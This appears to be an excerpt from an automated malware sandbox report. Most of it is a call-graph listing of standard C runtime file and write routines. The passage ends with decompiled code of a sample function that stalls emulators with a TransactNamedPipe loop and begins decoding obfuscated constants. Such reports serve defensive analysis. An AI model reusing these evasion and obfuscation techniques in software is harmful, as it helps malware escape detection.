API calls __cftof 9988->9991 9992 40d677 __malloc_crt 68 API calls 9988->9992 9993 409ae6 102 API calls _write_multi_char 9988->9993 9994 40bb24 6 API calls __decode_pointer 9988->9994 9995 409b0c 102 API calls _write_string 9988->9995 9989->9988 9990->9988 9991->9988 9992->9988 9993->9988 9994->9988 9995->9988 9997 409a9d 9996->9997 9998 409a8a 9996->9998 9997->9547 9998->9997 10012 406324 9998->10012 10154 408fe3 10000->10154 10002 406821 10002->9550 10004 40e076 10003->10004 10005 40e067 10003->10005 10007 40747b __close 68 API calls 10004->10007 10010 40e09a 10004->10010 10006 40747b __close 68 API calls 10005->10006 10008 40e06c 10006->10008 10009 40e08a 10007->10009 10008->9974 10011 409867 __close 6 API calls 10009->10011 10010->9974 10011->10010 10013 40633d 10012->10013 10017 40635f 10012->10017 10014 408d86 __fileno 68 API calls 10013->10014 10013->10017 10015 406358 10014->10015 10018 408caa 10015->10018 10017->9997 10019 408cb6 __close 10018->10019 10020 408cd9 10019->10020 10021 408cbe 10019->10021 10022 408ce7 10020->10022 10028 408d28 10020->10028 10043 40748e 10021->10043 10025 40748e __close 68 API calls 10022->10025 10027 408cec 10025->10027 10026 40747b __close 68 API calls 10038 408ccb __close 10026->10038 10029 40747b __close 68 API calls 10027->10029 10046 40e409 10028->10046 10032 408cf3 10029->10032 10031 408d2e 10033 408d51 10031->10033 10034 408d3b 10031->10034 10035 409867 __close 6 API calls 10032->10035 10037 40747b __close 68 API calls 10033->10037 10056 408577 10034->10056 10035->10038 10040 408d56 10037->10040 10038->10017 10039 408d49 10115 408d7c 10039->10115 10041 40748e __close 68 API calls 10040->10041 10041->10039 10044 40bcf7 __getptd_noexit 68 API calls 10043->10044 10045 407493 10044->10045 10045->10026 10047 40e415 __close 10046->10047 10048 40e470 10047->10048 10051 407670 __lock 68 API calls 10047->10051 10049 40e492 __close 10048->10049 10050 40e475 EnterCriticalSection 10048->10050 10049->10031 10050->10049 10052 40e441 10051->10052 10053 40e458 10052->10053 10055 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10052->10055 10118 40e4a0 10053->10118 10055->10053 10057 408586 __write_nolock 10056->10057 10058 4085b8 10057->10058 10059 4085df 10057->10059 10087 4085ad 10057->10087 10060 40748e __close 68 API calls 10058->10060 10063 408647 10059->10063 10064 408621 10059->10064 10062 4085bd 10060->10062 10061 40dac5 __atodbl_l 5 API calls 10065 408ca8 10061->10065 10067 40747b __close 68 API calls 10062->10067 10066 40865b 10063->10066 10122 40e0be 10063->10122 10068 40748e __close 68 API calls 10064->10068 10065->10039 10071 40e05a __flsbuf 68 API calls 10066->10071 10070 4085c4 10067->10070 10072 408626 10068->10072 10073 409867 __close 6 API calls 10070->10073 10074 408666 10071->10074 10075 40747b __close 68 API calls 10072->10075 10073->10087 10076 40890c 10074->10076 10081 40bd70 __getptd 68 API calls 10074->10081 10077 40862f 10075->10077 10079 408bdb WriteFile 10076->10079 10080 40891c 10076->10080 10078 409867 __close 6 API calls 10077->10078 10078->10087 10082 408c0e GetLastError 10079->10082 10106 4088ee 10079->10106 10083 4089fa 10080->10083 10102 408930 10080->10102 10084 408681 GetConsoleMode 10081->10084 10082->10106 10093 408ada 10083->10093 10104 408a09 10083->10104 10084->10076 10086 4086ac 10084->10086 10085 408c59 10085->10087 10089 40747b __close 68 API calls 10085->10089 10086->10076 10088 4086be GetConsoleCP 10086->10088 10087->10061 10088->10106 10113 4086e1 10088->10113 10091 408c7c 10089->10091 10090 408c2c 10094 408c37 10090->10094 10095 408c4b 10090->10095 10097 40748e __close 68 API calls 10091->10097 10092 408b40 WideCharToMultiByte 10092->10082 10099 408b77 WriteFile 10092->10099 10093->10085 10093->10092 10093->10099 10093->10106 10098 40747b __close 68 API calls 10094->10098 10135 4074a1 10095->10135 10096 40899e WriteFile 10096->10082 10096->10102 10097->10087 10103 408c3c 10098->10103 10099->10093 10105 408bae GetLastError 10099->10105 10100 408a7e WriteFile 10100->10082 10100->10104 10102->10085 10102->10096 10102->10106 10107 40748e __close 68 API calls 10103->10107 10104->10085 10104->10100 10104->10106 10105->10093 10106->10085 10106->10087 10106->10090 10107->10087 10109 40de19 11 API calls __putwch_nolock 10109->10113 10110 40878d WideCharToMultiByte 10110->10106 10112 4087be WriteFile 10110->10112 10111 40dff5 80 API calls __fassign 10111->10113 10112->10082 10112->10113 10113->10082 10113->10106 10113->10109 10113->10110 10113->10111 10114 408812 WriteFile 10113->10114 10132 40e047 10113->10132 10114->10082 10114->10113 10153 40e4a9 LeaveCriticalSection 10115->10153 10117 408d84 10117->10038 10121 407596 LeaveCriticalSection 10118->10121 10120 40e4a7 10120->10048 10121->10120 10140 40e392 10122->10140 10124 40e0dc 10125 40e0e4 10124->10125 10126 40e0f5 SetFilePointer 10124->10126 10128 40747b __close 68 API calls 10125->10128 10127 40e10d GetLastError 10126->10127 10130 40e0e9 10126->10130 10129 40e117 10127->10129 10127->10130 10128->10130 10131 4074a1 __dosmaperr 68 API calls 10129->10131 10130->10066 10131->10130 10133 40e00f __isleadbyte_l 78 API calls 10132->10133 10134 40e056 10133->10134 10134->10113 10136 40748e __close 68 API calls 10135->10136 10137 4074ac __dosmaperr 10136->10137 10138 40747b __close 68 API calls 10137->10138 10139 4074bf 10138->10139 10139->10087 10141 40e3b7 10140->10141 10142 40e39f 10140->10142 10144 40748e __close 68 API calls 10141->10144 10149 40e3fc 10141->10149 10143 40748e __close 68 API calls 10142->10143 10145 40e3a4 10143->10145 10146 40e3e5 10144->10146 10147 40747b __close 68 API calls 10145->10147 10148 40747b __close 68 API calls 10146->10148 10150 40e3ac 10147->10150 10151 40e3ec 10148->10151 10149->10124 10150->10124 10152 409867 __close 6 API calls 10151->10152 10152->10149 10153->10117 10155 409013 LeaveCriticalSection 10154->10155 10156 408ff4 10154->10156 10155->10002 10156->10155 10157 408ffb 10156->10157 10160 407596 LeaveCriticalSection 10157->10160 10159 409010 10159->10002 10160->10159 10162 408fd4 EnterCriticalSection 10161->10162 10163 408fbe 10161->10163 10162->9567 10164 407670 __lock 68 API calls 10163->10164 10165 408fc7 10164->10165 10165->9567 10167 4066e3 __flsbuf 10166->10167 10170 40901f 10167->10170 10169 4066ee 10169->9569 10171 409042 LeaveCriticalSection 10170->10171 10172 40902f 10170->10172 10171->10169 10175 407596 LeaveCriticalSection 10172->10175 10174 40903f 10174->10169 10175->10174 10179 406537 __close 10176->10179 10177 40654a 10178 40747b __close 68 API calls 10177->10178 10180 40654f 10178->10180 10179->10177 10181 40657f 10179->10181 10182 409867 __close 6 API calls 10180->10182 10195 4095f8 10181->10195 10184 40655f __close @_EH4_CallFilterFunc@8 10182->10184 10184->9582 10185 406584 10186 406598 10185->10186 10187 40658b 10185->10187 10189 4065bf 10186->10189 10190 40659f 10186->10190 10188 40747b __close 68 API calls 10187->10188 10188->10184 10213 40932f 10189->10213 10192 40747b __close 68 API calls 10190->10192 10192->10184 10196 409604 __close 10195->10196 10197 407670 __lock 68 API calls 10196->10197 10208 409612 10197->10208 10198 409687 10238 409727 10198->10238 10199 40968e 10201 40d677 __malloc_crt 68 API calls 10199->10201 10202 409698 10201->10202 10202->10198 10204 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10202->10204 10203 40971c __close 10203->10185 10207 4096bd 10204->10207 10205 4075ad __mtinitlocknum 68 API calls 10205->10208 10206 408fb1 _puts 69 API calls 10206->10208 10209 4096c8 10207->10209 10210 4096db EnterCriticalSection 10207->10210 10208->10198 10208->10199 10208->10205 10208->10206 10212 40901f __getstream 2 API calls 10208->10212 10211 40617d ___freetlocinfo 68 API calls 10209->10211 10210->10198 10211->10198 10212->10208 10214 409351 10213->10214 10215 409365 10214->10215 10226 409384 10214->10226 10216 40747b __close 68 API calls 10215->10216 10217 40936a 10216->10217 10220 409867 __close 6 API calls 10217->10220 10218 4095b1 10248 40fa90 10218->10248 10219 409597 10221 40747b __close 68 API calls 10219->10221 10224 4065ca 10220->10224 10223 40959c 10221->10223 10225 409867 __close 6 API calls 10223->10225 10235 4065e5 10224->10235 10225->10224 10226->10219 10234 409541 10226->10234 10242 40fe5f 10226->10242 10231 40fcdb __fassign 103 API calls 10232 40955a 10231->10232 10233 40fcdb __fassign 103 API calls 10232->10233 10232->10234 10233->10234 10234->10218 10234->10219 10236 408fe3 _fprintf 2 API calls 10235->10236 10237 4065ed 10236->10237 10237->10184 10241 407596 LeaveCriticalSection 10238->10241 10240 40972e 10240->10203 10241->10240 10251 40fcf5 10242->10251 10244 40950c 10244->10219 10245 40fcdb 10244->10245 10264 40fab0 10245->10264 10304 40f9c4 10248->10304 10250 40faab 10250->10224 10252 40fd0c 10251->10252 10260 40fd05 _strncmp 10251->10260 10253 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10252->10253 10254 40fd18 10253->10254 10255 40fd76 10254->10255 10256 40fd4b 10254->10256 10254->10260 10259 40747b __close 68 API calls 10255->10259 10255->10260 10257 40747b __close 68 API calls 10256->10257 10258 40fd50 10257->10258 10261 409867 __close 6 API calls 10258->10261 10262 40fd83 10259->10262 10260->10244 10261->10260 10263 409867 __close 6 API calls 10262->10263 10263->10260 10265 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10264->10265 10266 40fac4 10265->10266 10267 40fae6 10266->10267 10268 40fb0c 10266->10268 10278 40953a 10266->10278 10279 412de8 10267->10279 10269 40fb11 10268->10269 10270 40fb3f 10268->10270 10272 40747b __close 68 API calls 10269->10272 10274 40747b __close 68 API calls 10270->10274 10270->10278 10273 40fb16 10272->10273 10275 409867 __close 6 API calls 10273->10275 10276 40fb4c 10274->10276 10275->10278 10277 409867 __close 6 API calls 10276->10277 10277->10278 10278->10231 10278->10234 10280 412df8 10279->10280 10284 412e2a 10279->10284 10282 412dfd 10280->10282 10280->10284 10283 40747b __close 68 API calls 10282->10283 10286 412e02 10283->10286 10288 412cf6 10284->10288 10285 412e12 10285->10278 10287 409867 __close 6 API calls 10286->10287 10287->10285 10289 412d0c 10288->10289 10300 412d31 ___ascii_strnicmp 10288->10300 10290 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10289->10290 10291 412d17 10290->10291 10292 412d1c 10291->10292 10293 412d51 10291->10293 10294 40747b __close 68 API calls 10292->10294 10296 412d83 10293->10296 10297 412d5b 10293->10297 10295 412d21 10294->10295 10298 409867 __close 6 API calls 10295->10298 10296->10300 10303 412e7d 103 API calls __tolower_l 10296->10303 10299 40747b __close 68 API calls 10297->10299 10298->10300 10301 412d60 10299->10301 10300->10285 10302 409867 __close 6 API calls 10301->10302 10302->10300 10303->10296 10306 40f9d0 __close 10304->10306 10305 40f9e3 10307 40747b __close 68 API calls 10305->10307 10306->10305 10308 40fa21 10306->10308 10309 40f9e8 10307->10309 10315 40f2a5 10308->10315 10311 409867 __close 6 API calls 10309->10311 10314 40f9f7 __close 10311->10314 10314->10250 10316 40f2ca 10315->10316 10375 412cbd 10316->10375 10319 40973f __invoke_watson 10 API calls 10320 40f2f5 10319->10320 10321 40f32e 10320->10321 10327 40f3ee 10320->10327 10322 40748e __close 68 API calls 10321->10322 10323 40f333 10322->10323 10324 40747b __close 68 API calls 10323->10324 10325 40f33d 10324->10325 10326 409867 __close 6 API calls 10325->10326 10355 40f34c 10326->10355 10381 40e4d0 10327->10381 10329 40f490 10330 40f4b1 CreateFileA 10329->10330 10331 40f497 10329->10331 10332 40f54b GetFileType 10330->10332 10333 40f4de 10330->10333 10334 40748e __close 68 API calls 10331->10334 10336 40f558 GetLastError 10332->10336 10337 40f59c 10332->10337 10335 40f517 GetLastError 10333->10335 10339 40f4f2 CreateFileA 10333->10339 10338 40f49c 10334->10338 10340 4074a1 __dosmaperr 68 API calls 10335->10340 10341 4074a1 __dosmaperr 68 API calls 10336->10341 10399 40e28b 10337->10399 10342 40747b __close 68 API calls 10338->10342 10339->10332 10339->10335 10343 40f4a6 10340->10343 10344 40f581 CloseHandle 10341->10344 10342->10343 10348 40747b __close 68 API calls 10343->10348 10344->10343 10346 40f58f 10344->10346 10347 40747b __close 68 API calls 10346->10347 10347->10343 10348->10355 10349 40f7da 10352 40f947 CloseHandle CreateFileA 10349->10352 10349->10355 10354 40f972 GetLastError 10352->10354 10352->10355 10356 4074a1 __dosmaperr 68 API calls 10354->10356 10371 40fa62 10355->10371 10358 40f97e 10356->10358 10357 40748e __close 68 API calls 10365 40f630 10357->10365 10464 40e30c 10358->10464 10361 4124d6 78 API calls __read_nolock 10361->10365 10363 408caa __locking 102 API calls 10363->10365 10364 40f842 10367 412a98 __close_nolock 71 API calls 10364->10367 10365->10349 10365->10361 10365->10363 10365->10364 10366 40b7bb 70 API calls __lseek_nolock 10365->10366 10370 40e0be 70 API calls __lseeki64_nolock 10365->10370 10418 412a98 10365->10418 10433 412320 10365->10433 10366->10365 10368 40f849 10367->10368 10369 40747b __close 68 API calls 10368->10369 10369->10355 10370->10365 10372 40fa67 10371->10372 10373 40fa8e 10371->10373 10481 40e4a9 LeaveCriticalSection 10372->10481 10373->10314 10376 412ccc 10375->10376 10380 40f2e6 10375->10380 10377 40747b __close 68 API calls 10376->10377 10378 412cd1 10377->10378 10379 409867 __close 6 API calls 10378->10379 10379->10380 10380->10319 10380->10320 10382 40e4dc __close 10381->10382 10383 4075ad __mtinitlocknum 68 API calls 10382->10383 10384 40e4ec 10383->10384 10385 40e4f1 __close 10384->10385 10386 407670 __lock 68 API calls 10384->10386 10385->10329 10395 40e500 10386->10395 10387 40e643 10476 40e661 10387->10476 10388 40e5d9 10390 40d6bc __calloc_crt 68 API calls 10388->10390 10393 40e5e2 10390->10393 10391 407670 __lock 68 API calls 10391->10395 10392 40e581 EnterCriticalSection 10394 40e591 LeaveCriticalSection 10392->10394 10392->10395 10393->10387 10396 40e409 ___lock_fhandle 69 API calls 10393->10396 10394->10395 10395->10387 10395->10388 10395->10391 10395->10392 10397 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10395->10397 10473 40e5a3 10395->10473 10396->10387 10397->10395 10400 40e2f2 10399->10400 10401 40e299 10399->10401 10402 40747b __close 68 API calls 10400->10402 10401->10400 10406 40e2bd 10401->10406 10403 40e2f7 10402->10403 10405 40748e __close 68 API calls 10403->10405 10404 40e2e8 10404->10349 10404->10365 10408 40b7bb 10404->10408 10405->10404 10406->10404 10407 40e2e2 SetStdHandle 10406->10407 10407->10404 10409 40e392 __close_nolock 68 API calls 10408->10409 10410 40b7ca 10409->10410 10411 40b7e0 SetFilePointer 10410->10411 10412 40b7d0 10410->10412 10414 40b7f7 GetLastError 10411->10414 10415 40b7ff 10411->10415 10413 40747b __close 68 API calls 10412->10413 10416 40b7d5 10413->10416 10414->10415 10415->10416 10417 4074a1 __dosmaperr 68 API calls 10415->10417 10416->10357 10416->10365 10417->10416 10419 40e392 __close_nolock 68 API calls 10418->10419 10422 412aa8 10419->10422 10420 412afe 10421 40e30c __free_osfhnd 69 API calls 10420->10421 10425 412b06 10421->10425 10422->10420 10423 412adc 10422->10423 10426 40e392 __close_nolock 68 API calls 10422->10426 10423->10420 10424 40e392 __close_nolock 68 API calls 10423->10424 10427 412ae8 CloseHandle 10424->10427 10428 412b28 10425->10428 10431 4074a1 __dosmaperr 68 API calls 10425->10431 10429 412ad3 10426->10429 10427->10420 10430 412af4 GetLastError 10427->10430 10428->10365 10432 40e392 __close_nolock 68 API calls 10429->10432 10430->10420 10431->10428 10432->10423 10434 40e0be __lseeki64_nolock 70 API calls 10433->10434 10435 41233f 10434->10435 10436 4123a2 10435->10436 10438 40e0be __lseeki64_nolock 70 API calls 10435->10438 10437 40747b __close 68 API calls 10436->10437 10439 4123ad 10436->10439 10437->10439 10442 41235b 10438->10442 10439->10365 10440 41243d 10446 40e0be __lseeki64_nolock 70 API calls 10440->10446 10461 4124a6 10440->10461 10441 412381 GetProcessHeap HeapAlloc 10443 41239d 10441->10443 10449 4123b4 __setmode_nolock 10441->10449 10442->10436 10442->10440 10442->10441 10445 40747b __close 68 API calls 10443->10445 10444 40e0be __lseeki64_nolock 70 API calls 10444->10436 10445->10436 10447 412456 10446->10447 10447->10436 10448 40e392 __close_nolock 68 API calls 10447->10448 10450 41246c SetEndOfFile 10448->10450 10451 408577 __write_nolock 100 API calls 10449->10451 10455 412420 10449->10455 10460 4123f7 __setmode_nolock 10449->10460 10452 412489 10450->10452 10450->10461 10451->10449 10453 40747b __close 68 API calls 10452->10453 10454 41248e 10453->10454 10456 40748e __close 68 API calls 10454->10456 10457 40748e __close 68 API calls 10455->10457 10459 412499 GetLastError 10456->10459 10458 412425 10457->10458 10458->10460 10462 40747b __close 68 API calls 10458->10462 10459->10461 10463 412405 GetProcessHeap HeapFree 10460->10463 10461->10436 10461->10444 10462->10460 10463->10461 10465 40e378 10464->10465 10466 40e31d 10464->10466 10467 40747b __close 68 API calls 10465->10467 10466->10465 10469 40e348 10466->10469 10468 40e37d 10467->10468 10470 40748e __close 68 API calls 10468->10470 10471 40e36e 10469->10471 10472 40e368 SetStdHandle 10469->10472 10470->10471 10471->10355 10472->10471 10479 407596 LeaveCriticalSection 10473->10479 10475 40e5aa 10475->10395 10480 407596 LeaveCriticalSection 10476->10480 10478 40e668 10478->10385 10479->10475 10480->10478 10481->10373 10483 4063e0 __close 10482->10483 10484 407670 __lock 68 API calls 10483->10484 10491 4063ef 10484->10491 10485 406487 10508 4064a5 10485->10508 10487 408fb1 _puts 69 API calls 10487->10491 10488 406493 __close 10488->9595 10490 40638c 106 API calls __fflush_nolock 10490->10491 10491->10485 10491->10487 10491->10490 10505 406476 10491->10505 10493 4063a2 10492->10493 10494 406399 10492->10494 10496 406324 __flush 102 API calls 10493->10496 10495 4063d4 _flsall 106 API calls 10494->10495 10501 40639f 10495->10501 10497 4063a8 10496->10497 10498 408d86 __fileno 68 API calls 10497->10498 10497->10501 10499 4063c1 10498->10499 10512 408db8 10499->10512 10502 4064f7 10501->10502 10503 408fe3 _fprintf 2 API calls 10502->10503 10504 4064ff 10503->10504 10504->9595 10506 40901f __getstream 2 API calls 10505->10506 10507 406484 10506->10507 10507->10491 10511 407596 LeaveCriticalSection 10508->10511 10510 4064ac 10510->10488 10511->10510 10513 408dc4 __close 10512->10513 10514 408dcc 10513->10514 10515 408ddf 10513->10515 10517 40747b __close 68 API calls 10514->10517 10516 408ded 10515->10516 10520 408e27 10515->10520 10518 40747b __close 68 API calls 10516->10518 10524 408dd1 __close 10517->10524 10519 408df2 10518->10519 10521 409867 __close 6 API calls 10519->10521 10522 40e409 ___lock_fhandle 69 API calls 10520->10522 10521->10524 10523 408e2d 10522->10523 10525 408e66 10523->10525 10527 40e392 __close_nolock 68 API calls 10523->10527 10524->10501 10526 40747b __close 68 API calls 10525->10526 10528 408e70 10526->10528 10529 408e42 FlushFileBuffers 10527->10529 10534 408e8f 10528->10534 10530 408e59 10529->10530 10531 408e4e GetLastError 10529->10531 10530->10528 10533 40748e __close 68 API calls 10530->10533 10531->10530 10533->10525 10537 40e4a9 LeaveCriticalSection 10534->10537 10536 408e97 10536->10524 10537->10536 10539 406ac9 10538->10539 10540 406ab9 10538->10540 10542 406adb 10539->10542 10553 40b90c 10539->10553 10541 40747b __close 68 API calls 10540->10541 10549 406abe 10541->10549 10544 406324 __flush 102 API calls 10542->10544 10545 406ae9 10544->10545 10546 408d86 __fileno 68 API calls 10545->10546 10547 406b1b 10546->10547 10570 40b830 10547->10570 10550 406bae 10549->10550 10551 408fe3 _fprintf 2 API calls 10550->10551 10552 406bb6 10551->10552 10552->9609 10554 40b93f 10553->10554 10555 40b91f 10553->10555 10556 408d86 __fileno 68 API calls 10554->10556 10557 40747b __close 68 API calls 10555->10557 10559 40b945 10556->10559 10558 40b924 10557->10558 10560 409867 __close 6 API calls 10558->10560 10561 40b830 __locking 72 API calls 10559->10561 10569 40b934 10560->10569 10562 40b95a 10561->10562 10563 40b9ce 10562->10563 10565 40b989 10562->10565 10562->10569 10564 40747b __close 68 API calls 10563->10564 10564->10569 10566 40b830 __locking 72 API calls 10565->10566 10565->10569 10567 40ba29 10566->10567 10568 40b830 __locking 72 API calls 10567->10568 10567->10569 10568->10569 10569->10542 10571 40b83c __close 10570->10571 10572 40b844 10571->10572 10573 40b85f 10571->10573 10575 40748e __close 68 API calls 10572->10575 10574 40b86d 10573->10574 10579 40b8ae 10573->10579 10576 40748e __close 68 API calls 10574->10576 10577 40b849 10575->10577 10578 40b872 10576->10578 10580 40747b __close 68 API calls 10577->10580 10581 40747b __close 68 API calls 10578->10581 10582 40e409 ___lock_fhandle 69 API calls 10579->10582 10589 40b851 __close 10580->10589 10583 40b879 10581->10583 10584 40b8b4 10582->10584 10585 409867 __close 6 API calls 10583->10585 10586 40b8c1 10584->10586 10587 40b8d7 10584->10587 10585->10589 10590 40b7bb __lseek_nolock 70 API calls 10586->10590 10588 40747b __close 68 API calls 10587->10588 10591 40b8dc 10588->10591 10589->10549 10592 40b8cf 10590->10592 10593 40748e __close 68 API calls 10591->10593 10595 40b902 10592->10595 10593->10592 10598 40e4a9 LeaveCriticalSection 10595->10598 10597 40b90a 10597->10589 10598->10597 10600 40606d 10599->10600 10603 407364 __ctrlfp __floor_pentium4 10599->10603 10601 40609e 10600->10601 10600->10603 10608 4060e8 10601->10608 10610 4070a0 10601->10610 10602 4073d1 __floor_pentium4 10607 4073be __ctrlfp 10602->10607 10626 40d341 10602->10626 10603->10602 10606 4073ae 10603->10606 10603->10607 10619 40d2ec 10606->10619 10607->9612 10608->9612 10611 4070d6 10610->10611 10614 4070e1 10610->10614 10612 40bb24 __decode_pointer 6 API calls 10611->10612 10612->10614 10613 407174 10613->10608 10614->10613 10615 4071b8 10614->10615 10616 407132 10614->10616 10615->10613 10617 40747b __close 68 API calls 10615->10617 10616->10613 10618 40747b __close 68 API calls 10616->10618 10617->10613 10618->10613 10620 40d322 10619->10620 10621 40d2fa 10619->10621 10623 40747b __close 68 API calls 10620->10623 10637 40d24c 10621->10637 10625 40d327 __ctrlfp 10623->10625 10624 40d31d 10624->10607 10625->10607 10627 40d377 __handle_exc 10626->10627 10628 40d39d __except1 10627->10628 10652 40cfe6 10627->10652 10630 40d3df 10628->10630 10631 40d3b8 10628->10631 10632 40d1eb __87except 68 API calls 10630->10632 10633 40d24c __umatherr 68 API calls 10631->10633 10634 40d3da __ctrlfp 10632->10634 10633->10634 10635 40dac5 __atodbl_l 5 API calls 10634->10635 10636 40d403 10635->10636 10636->10607 10638 40d256 10637->10638 10639 40d271 __87except __ctrlfp 10638->10639 10640 40d2cf __ctrlfp 10638->10640 10643 40d2bf 10639->10643 10645 40d1eb 10639->10645 10641 40d1eb __87except 68 API calls 10640->10641 10642 40d2e4 10641->10642 10642->10624 10643->10624 10646 40d1f6 10645->10646 10647 40d20b 10645->10647 10648 40d210 10646->10648 10650 40747b __close 68 API calls 10646->10650 10649 40747b __close 68 API calls 10647->10649 10648->10643 10649->10648 10651 40d203 10650->10651 10651->10643 10655 40cd0a 10652->10655 10656 40cd31 __raise_exc_ex 10655->10656 10657 40cf24 RaiseException 10656->10657 10658 40cf3d 10657->10658 10658->10628 10660 40b5fc 10659->10660 10662 40b5db 10659->10662 10660->9628 10661 40b5e7 10663 40747b __close 68 API calls 10661->10663 10662->10660 10662->10661 10666 40b61a _realloc 10662->10666 10664 40b5ec 10663->10664 10665 409867 __close 6 API calls 10664->10665 10665->10660 10666->10660 10667 40b465 __flsbuf 102 API calls 10666->10667 10668 406324 __flush 102 API calls 10666->10668 10669 408d86 __fileno 68 API calls 10666->10669 10670 408caa __locking 102 API calls 10666->10670 10667->10666 10668->10666 10669->10666 10670->10666 10672 408d86 __fileno 68 API calls 10671->10672 10673 40b475 10672->10673 10674 40b480 10673->10674 10675 40b497 10673->10675 10676 40747b __close 68 API calls 10674->10676 10677 40b49b 10675->10677 10685 40b4a8 __flsbuf 10675->10685 10684 40b485 10676->10684 10678 40747b __close 68 API calls 10677->10678 10678->10684 10679 40b598 10681 408caa __locking 102 API calls 10679->10681 10680 40b518 10682 40b52f 10680->10682 10687 40b54c 10680->10687 10681->10684 10683 408caa __locking 102 API calls 10682->10683 10683->10684 10684->9629 10685->10684 10686 40e05a __flsbuf 68 API calls 10685->10686 10688 40b4fe 10685->10688 10691 40b509 10685->10691 10686->10688 10687->10684 10699 40e143 10687->10699 10688->10691 10696 411040 10688->10696 10691->10679 10691->10680 10693 406a9b __flsbuf 10692->10693 10694 40901f __getstream 2 API calls 10693->10694 10695 406aa6 10694->10695 10695->9622 10697 40d677 __malloc_crt 68 API calls 10696->10697 10698 411055 10697->10698 10698->10691 10700 40e14f __close 10699->10700 10701 40e160 10700->10701 10702 40e17c 10700->10702 10703 40748e __close 68 API calls 10701->10703 10704 40e18a 10702->10704 10706 40e1ab 10702->10706 10705 40e165 10703->10705 10707 40748e __close 68 API calls 10704->10707 10710 40747b __close 68 API calls 10705->10710 10708 40e1f1 10706->10708 10709 40e1cb 10706->10709 10711 40e18f 10707->10711 10713 40e409 ___lock_fhandle 69 API calls 10708->10713 10712 40748e __close 68 API calls 10709->10712 10724 40e16d __close 10710->10724 10714 40747b __close 68 API calls 10711->10714 10716 40e1d0 10712->10716 10717 40e1f7 10713->10717 10715 40e196 10714->10715 10718 409867 __close 6 API calls 10715->10718 10719 40747b __close 68 API calls 10716->10719 10720 40e220 10717->10720 10721 40e204 10717->10721 10718->10724 10723 40e1d7 10719->10723 10722 40747b __close 68 API calls 10720->10722 10725 40e0be __lseeki64_nolock 70 API calls 10721->10725 10727 40e225 10722->10727 10728 409867 __close 6 API calls 10723->10728 10724->10684 10726 40e215 10725->10726 10731 40e252 10726->10731 10729 40748e __close 68 API calls 10727->10729 10728->10724 10729->10726 10734 40e4a9 LeaveCriticalSection 10731->10734 10733 40e25a 10733->10724 10734->10733 10736 406d38 __close 10735->10736 10737 407670 __lock 68 API calls 10736->10737 10738 406d3f 10737->10738 10739 406df8 __initterm 10738->10739 10741 40bb24 __decode_pointer 6 API calls 10738->10741 10752 406e43 10739->10752 10743 406d76 10741->10743 10743->10739 10745 40bb24 __decode_pointer 6 API calls 10743->10745 10751 406d8b 10745->10751 10746 406e37 10748 406c3c _fast_error_exit 3 API calls 10746->10748 10747 406e40 __close 10747->9005 10748->10747 10749 40bb1b 7 API calls ___crtMessageBoxW 10749->10751 10750 40bb24 6 API calls __decode_pointer 10750->10751 10751->10739 10751->10749 10751->10750 10753 406e24 10752->10753 10754 406e49 10752->10754 10753->10747 10756 407596 LeaveCriticalSection 10753->10756 10757 407596 LeaveCriticalSection 10754->10757 10756->10746 10757->10753 10758 40bb1b 10759 40baa9 __encode_pointer 7 API calls 10758->10759 10760 40bb22 10759->10760

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E004058A1(void* __fp0) {
                      				signed int _v16;
                      				void* _v20;
                      				signed int _v36;
                      				long _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				intOrPtr _v84;
                      				intOrPtr _v88;
                      				intOrPtr _v92;
                      				intOrPtr _v96;
                      				intOrPtr _v100;
                      				intOrPtr _v104;
                      				intOrPtr _v108;
                      				intOrPtr _v112;
                      				intOrPtr _v116;
                      				intOrPtr _v120;
                      				intOrPtr _v124;
                      				intOrPtr _v128;
                      				intOrPtr _v132;
                      				intOrPtr _v136;
                      				intOrPtr _v140;
                      				intOrPtr _v144;
                      				intOrPtr _v148;
                      				intOrPtr _v152;
                      				intOrPtr _v156;
                      				intOrPtr _v160;
                      				intOrPtr _v164;
                      				intOrPtr _v168;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t365;
                      				intOrPtr* _t381;
                      				intOrPtr* _t384;
                      				void* _t387;
                      				void* _t390;
                      				void* _t394;
                      				void* _t395;
                      				void* _t397;
                      				signed int _t403;
                      				signed int _t404;
                      				void* _t405;
                      				intOrPtr* _t406;
                      				void* _t412;
                      
                      				_t412 = __fp0;
                      				_t404 = _t403 & 0xfffffff8;
                      				_push(0xffffffff);
                      				_push(E00416C51);
                      				_push( *[fs:0x0]);
                      				 *[fs:0x0] = _t404;
                      				_t405 = _t404 - 0x9c;
                      				_t397 = 0xe3a7;
                      				do {
                      					GetLastError();
                      					TransactNamedPipe(0, 0, 0, 0, 0, 0, 0); // executed
                      					_t397 = _t397 - 1;
                      				} while (_t397 != 0);
                      				_v76 = 0x812ae72;
                      				_v108 = 0x374ff37f;
                      				_v144 = 0x53039ceb;
                      				_v88 = 0x26f83b54;
                      				_v152 = 0x2c845f70;
                      				_v64 = 0x664b1a94;
                      				_v56 = 0x2038cb82;
                      				_v104 = 0x18f219b6;
                      				_v124 = 0x52833b47;
                      				_v92 = 0x24568fa0;
                      				_v112 = 0xc292fcb;
                      				_v68 = 0x310707b5;
                      				_v60 = 0x7eccb7a1;
                      				_v128 = 0x51beb4a8;
                      				_v148 = 0x23570ec5;
                      				_v96 = 0x13bb2b31;
                      				_v140 = 0x41e4b1e5;
                      				_v164 = 0x29829f26;
                      				_v120 = 0x6640d5e5;
                      				_v100 = 0x2b35ebd4;
                      				_v72 = 0x304a9f21;
                      				_v156 = 0x42da8ef7;
                      				_v116 = 0x6e9395e5;
                      				_v160 = 0x4663bccc;
                      				_v168 = 0xd57d1e7;
                      				_v80 = 0x58efb44f;
                      				_v136 = 0x146317d6;
                      				_v84 = 0x1f0b1819;
                      				_v132 = 0x3d33338;
                      				_v76 = _v76 + 0x653b0d1e;
                      				_v76 = _v76 - 0x1af0d3ea;
                      				_v76 = _v76 + 0x398a55da;
                      				_v144 = _v144 - 0x684b7b80;
                      				_v76 = _v76 - 0x230a939f;
